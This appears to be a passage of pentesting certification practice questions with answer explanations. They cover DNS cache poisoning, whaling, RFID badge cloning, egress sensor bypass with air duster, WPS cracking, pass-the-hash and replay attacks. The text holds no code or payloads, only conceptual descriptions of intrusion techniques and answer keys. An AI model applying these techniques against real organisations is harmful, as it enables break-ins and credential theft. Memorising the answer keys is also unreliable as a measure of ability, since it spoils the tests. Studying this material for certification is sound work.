C. The programmer in this scenario has used hidden elements in the HTML code. This is an unsecure coding practice that can result in sensitive information being stored in the user's browser (the DOM).
73. A penetration tester is conducting a gray box penetration test. She notices that one of the branch offices of the organization uses a caching-only DNS server to handle name resolution requests. She sends a bogus reply to a name resolution request from the caching-only DNS server, using a spoofed source address in the reply packets. The bogus name resolution records point users to a fake web server that is used to harvest authentication credentials. What is this exploit called? A. DNS poisoning B. ARP poisoning C. DNS cache poisoning D. Man-in-the-middle
C. This is also an example of DNS cache poisoning. Instead of poisoning the local DNS cache on workstations, the cache of the caching-only DNS server has been poisoned in this scenario. The poisoned records will remain in the cache until the TTL value is reached.
72. A penetration tester is conducting a gray box penetration test. She crafts a Trojan horse exploit that flushes the DNS cache on the local workstation and replaces it with malicious name resolution entries that point to a fake web server. When clients within the organization try to resolve hostnames, the malicious entries from the local DNS cache are used. What is this exploit called? A. DNS poisoning B. ARP poisoning C. DNS cache poisoning D. Man-in-the-middle
C. This is an example of DNS cache poisoning. Instead of compromising a heavily protected DNS server, the penetration tester simply compromises the DNS cache on relatively less secure workstations. The net effect is the same. Malware is a common delivery vehicle for DNS cache poisoning exploits.
106. During a black box penetration test, the tester discovers that the organization's wireless access point has been configured with an administrative username of admin and a password of Admin. The tester gains administrative access to the access point. What kind of authentication exploit occurred in this scenario? A. Weak credentials exploit B. Redirect attack C. Default credentials attack D. Credential brute-forcing
C. This is an example of a default credentials attack. Most network devices, including access points, routers, firewalls, and so on, come from the factory preconfigured with default administrative credentials. These defaults are well documented on the Internet. If the administrator forgets to change them, then the tester can use them to gain administrative access to the device.
105. During a gray box penetration test, the tester uses phishing emails to send users to a logon page that looks like the target organization's human resources self-service page. The fake page is used to capture employees' credentials. What type of authentication exploit was used in this scenario? A. Kerberos exploit B. Session hijacking C. Redirect attack D. Credential brute forcing
C. This is an example of a redirect attack because users are redirected to a fake website by the phishing emails.
91. You are performing a gray box penetration test. To capture information from multiple VLANs, you have configured the network board in your computer to emulate a trunk port on a network switch. Your goal is to get the real switch to forward traffic from all VLANs to your device. What is this exploit called? A. MAC address spoofing B. Double-tagging C. Switch spoofing D. Evil twin
C. This is an example of a switch spoofing exploit that is used for VLAN hopping. In a switch spoofing exploit, the tester's network board is reconfigured to emulate a trunk port on a network switch. By doing this, the real switch will think it needs to forward traffic from all VLANs to the tester's device.
78. A replay attack is commonly categorized as which type of exploit? A. Denial of service (DoS) B. NAC bypass C. Distributed denial of service (DDoS) D. Man-in-the-middle
D. A replay attack is also classified as a man-in-the-middle attack.
3. You are performing a black box penetration test for a medium-sized organization. You have used reconnaissance techniques to identify the CEO's email address as well as the email address belonging to a help desk employee. You craft an email to the CEO that appears to come from the help desk employee directing the CEO to reset her password. When she clicks the link provided in the email, she is redirected to your own website where her credentials are captured to a text file. What kind of exploit did you use? A. Smishing B. Vishing C. Spear phishing D. Whaling
D. A whaling attack is essentially a form of spear phishing attack that is aimed specifically at C-suite employees, such as the CEO, CFO, COO, CIO, and so on. A standard spear phishing attack, on the other hand, would have been sent to a lower-level employee within the organization.
54. Using reconnaissance, a penetration tester learns that the target organization's employees use RFID access badges to unlock doors within the facility. Using the company's website, he identifies high-level employees within the organization. Then he waits in the parking lot until he sees one of these individuals heading toward the front doors. He walks behind them into the reception area with a small RFID reader hidden in his coat. He captures the RFID signature from the individual's badge and then creates his own fake access badge and encodes it with that RFID signature. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
D. Badge cloning occurs when an attacker makes a copy of a valid access badge to enter a facility. By copying a valid badge's RFID signature, the penetration tester in this scenario can use the fake badge to access the target organization's facility using the authorized employee's credentials. Because he carefully selected a high-level employee's badge for cloning, he may be able to access more sensitive areas of the facility.
22. A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be an agent with the Federal Bureau of Investigations (FBI). The email indicates that the employee's manager is being investigated for embezzlement and asks the employee to reply with sensitive internal information. What motivation factor did the penetration tester use in this scenario? A. Likeness B. Scarcity C. Social proof D. Authority
D. By masquerading as an FBI agent, the penetration tester in this example utilized authority (and possibly fear) as a motivation factor to coerce the employee into divulging sensitive information.
44. The exterior double glass door to a facility has a motion sensor installed that automatically unlocks the door when someone is leaving the facility. To gain unauthorized access to the facility, a penetration tester sprays a can of air duster in the center crack between the doors to trigger the motion sensor and unlock the door. What is this technique called? A. Lock picking B. Tailgating C. Fence jumping D. Egress sensor bypass
D. Egress sensor bypass occurs when an attacker manipulates an egress sensor to unlock a door. In this scenario, the moving compressed air from the air duster is much colder and denser than the surrounding air, causing the egress sensor to think someone is exiting the building and unlock the door.
40. As a penetration tester approaches the main entrance to the target organization's physical facility, she notices that a turnstile is used to control access. She carefully steps over the turnstile instead of walking through it. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Fence jumping
D. Fence jumping occurs when an unauthorized person simply jumps over a physical barrier designed to control access. In this scenario, the penetration tester simply steps over the turnstile that is designed to prevent unauthorized people from entering.
48. A target organization's facility is surrounded by a tall chain-link fence topped with barbed wire. A penetration tester observes that a remote section of the fence is overgrown with shrubbery. Late at night, she uses bolt cutters to cut a slit in the fence that she can slip through at a later time. What is this technique called? A. Egress sensor bypass B. Lock bypass C. Badge cloning D. Fence jumping
D. Fence jumping occurs when an unauthorized person simply jumps over or cuts through a physical barrier designed to control access. In this scenario, the tester penetrated the physical fence barrier by cutting a hole in it.
99. A penetration tester learns that the target organization's employees use RFID access badges to unlock doors within the facility. She identifies a restaurant where employees of the organization commonly gather for lunch. The next day, she sits at a table near a group of employees in the restaurant with a small, hidden RFID reader. She captures the RFID signature from the employees' badges and then creates fake access badges using the RFID signatures. What is this technique called? A. WPS cracking B. Credential harvesting C. Jamming D. RFID cloning
D. In RFID cloning, the penetration tester captures the RFID signature from a legitimate RFID device and then copies it to a fake device. This is commonly done to copy an RFID access badge.
110. Which form of a cross-site scripting (XSS) attack leverages an older, vulnerable web browser being run locally on the victim's computer? A. Stored/persistent B. Clickjacking C. Reflected D. Document Object Model (DOM)
D. In a DOM XSS exploit, the attacker exploits weaknesses in the victim's web browser. Typically, outdated browsers are most susceptible to this type of exploit. This is considered to be a client-side XSS attack.
94. Which wireless encryption key cracking exploit involves extracting a small amount of keying material from captured wireless packets and then sending ARP frames to the access point? A. Repeating attack B. Downgrade attack C. Deauth attack D. Fragmentation attack
D. In a fragmentation wireless attack, a small amount of keying material is extracted from a captured packet. Then, an ARP packet is sent with known content to the access point. If the packet is echoed back by the AP, then even more keying information can be obtained from the returned packet. If this process is repeated over and over, the entire wireless key can be exposed.
100. Which wireless exploit is more of a stress test designed to prevent users from being able to use a wireless network? A. Karma attack B. Deauth attack C. Downgrade attack D. Jamming attack
D. In a jamming attack, the penetration tester transmits a radio signal in the 2.4 GHz and/or 5 GHz frequency ranges that is powerful enough to disrupt the legitimate wireless signal. This disruption prevents users from using the wireless network. As such, this exploit can be classified as a network stress test or denial-of-service attack.
6. Which social engineering technique involves questioning an employee using intimidation to gather information? A. Phishing B. Smishing C. Impersonation D. Interrogation
D. Interrogation involves questioning an employee of the target organization, using fear as a motivation to gather information. Interrogation is not a technique that is typically used by penetration testers.
96. Which wireless exploit involves using a brute-force attack to crack an eight-digit pin? A. Fragmentation attack B. Credential harvesting C. Bluejacking D. WPS cracking
D. Many wireless devices use a Wi-Fi Protected Setup (WPS) system to make connecting to the wireless network easier. However, most WPS implementations have a key weakness in that they use a simple eight-digit pin for authenticating wireless devices. Because of its short length, the pin can be cracked quite quickly, allowing a penetration tester to easily connect to a target wireless network.
26. You are performing reconnaissance as a part of a black box penetration test. You notice that the employees of the target organization commonly congregate at a particular outdoor restaurant for lunch. You hire several young, physically attractive consultants to help with the penetration test. You send them to the same restaurant for lunch and have them make friends with several of the target organization's employees. They gain the employees' trust, and the employees begin to share information about their jobs, computers, bosses, customers, projects, and so on. Which motivation factor was used in this scenario? A. Authority B. Scarcity C. Social proof D. Likeness
D. The penetration tester is using likeness as a motivating factor. By hiring young, friendly, and physically attractive assistants, the penetration tester is able to coerce employees of the target organization into revealing sensitive information about their employer.
25. A penetration tester sends a phishing email to the employees of the target organization. The email purports to be offering iPads for an absurdly low price. However, there are only 25 left at this price. The link in the email leads to a fake website that uses a drive- by-download script that drops a keylogger on the employee's computer. What motivation factor did the penetration tester use in this scenario? A. Fear B. Social proof C. Authority D. Scarcity
D. The penetration tester is using scarcity as a motivating factor. By asserting that there are only a small number of devices available at the steeply discounted price, the employees are motivated to make a purchase before supplies run out.
119. A web application programmer has included the username and password required to access a database instance within the application's PHP code. This is an example of which unsecure code practice? A. Comments in source code B. Race conditions C. Unauthorized use of functions/unprotected APIs D. Hard-coded credentials
D. The programmer in this scenario has used hard-coded credentials. If an attacker (or a penetration tester) were to view the application's source code, they would have access to the database authentication credentials.
108. During a gray box penetration test, the tester is able to run an exploit that enables her to receive a ticket-granting ticket (TGT) from the key distribution center (KDC) in the organization's Active Directory domain. What kind of authentication exploit occurred in this scenario? A. Credential brute-forcing exploit B. Redirect attack C. Session hijacking D. Kerberos exploit
D. This is an example of a Kerberos exploit. Receiving a ticket-granting ticket (TGT) allows the user to obtain additional ticket-granting service (TGS) tickets, which grant access to specific network services. Because it allows users to get other TGS tickets, the TGT is sometimes referred to as a golden ticket. Because the TGS ticket can be used only to access a specific network service, it is sometimes referred to as a silver ticket.
74. While performing a gray-box penetration test, the tester discovers that several Linux workstations in the network have not been joined to the organization's Active Directory domain, even though they have the Samba service installed. To access shared folders on Windows servers, these workstations use NT LAN Manager (NTLM) connections. The tester captures hashed user credentials as they are passed between workstations and servers and then reuses them later to establish new authenticated sessions with the file servers. What is this exploit called? A. ARP poisoning B. Fraggle attack C. NAC bypass D. Pass the hash
D. This is an example of a pass-the-hash exploit. In this exploit, the tester captures hashed NTLM user credentials and then reuses them to authenticate at a later point in time to a Windows system. Because NTLM authentication uses hashed credentials, the tester doesn't need to know the victim's actual username and password. The hashed credentials are sufficient to create a new authenticated session.
77. During a black box penetration test, the tester parks in the target organizations parking lot and captures wireless network signals emanating from the building with his laptop. By doing this, he is able to capture the handshake process used by an authorized wireless client as it connects to the network. He later resends this handshake on the wireless network, allowing his laptop to connect to the wireless network as that authorized client. What kind of exploit is this? A. DNS cache poisoning B. ARP spoofing C. Pass the hash D. Replay attack
D. This is an example of a replay attack. The tester captures valid handshake data from the wireless network and they replays it later to authenticate his laptop to the wireless network.
